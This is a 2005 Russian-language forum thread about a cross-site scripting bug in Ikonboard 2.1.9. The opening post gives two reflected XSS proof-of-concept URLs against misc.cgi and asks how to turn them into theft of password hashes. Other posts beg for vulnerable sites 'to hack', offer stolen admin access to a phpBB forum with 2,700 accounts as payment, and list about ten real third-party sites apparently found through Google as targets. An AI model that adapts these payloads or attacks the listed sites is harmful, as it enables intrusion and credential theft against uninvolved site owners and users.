Форумы XSS в Ikonboard 2.1.9 RussianFullPack

Discussion in 'Уязвимости CMS/форумов' started by REDACTOR.-, 16 Mar 2005.

  1. REDACTOR.-

    REDACTOR.- New Member

    Joined:
    13 Mar 2005
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Что можно сделать с этим багом, или как сделать URL запрос, так чтобы были хеши паролей? :confused:
    Эти exploit's реализуются на том сайте!!!Как мне их переделать?

    Exploit'ы:
    http://target/cgi-bin/ikonboard/misc.cgi?action=aim&aimname=<script>javascript:alert('hello')</script>
    http://target/cgi-bin/ikonboard/misc.cgi?action=icq&UIN=<script>javascript:alert('hello')</script>
     
  2. White Jordan

    White Jordan Guest

    Reputations:
    0
    Дай мне линк Я хочу взломать. Трудно найти сайты с уязвимыми старыми багами. Дай короче мне ссылку.
     
  3. REDACTOR.-

    REDACTOR.- New Member

    Joined:
    13 Mar 2005
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
  4. White Jordan

    White Jordan Guest

    Reputations:
    0
    Давай линк быстрее. Хорошо взламывать не буду но багу посмотрю договорились? Ссылку давай.
     
  5. REDACTOR.-

    REDACTOR.- New Member

    Joined:
    13 Mar 2005
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Объясни как и я тебе дам админа на phpBB 2.0.6 с 2700 аккаунтами etc... :rolleyes:
     
  6. White Jordan

    White Jordan Guest

    Reputations:
    0
    Гы гы гы......на таких форумах Я и сам могу получить Админа. Вот просто трудно сейчас на нете найти вещи со старыми багами. Я просто по экспорементировать хочу вот и всё. У меня есть идеи которые Я хочу проверить. Давай ссылку не жадничай.
     
  7. QuickSilver

    QuickSilver New Member

    Joined:
    11 Jan 2005
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Я на первой странице гугла кучу нашел :p (см. ниже). Я тока на версию внимания не обращал и запросик в гугле другой сделал, оттуда такая результативность:D

    http://www.xtcidearecords.co.uk.....

    http://www.animestreet.de....

    http://gramota.org.ru.....

    http://www.medialabs.com.sg.....

    http://www.speechdelay.com.....

    http://www.nekobox.org.....

    http://www.skat.com.....

    http://www.xfilesuk.com.....

    http://www.ebookfriends.com.....

    http://www.toudy.com......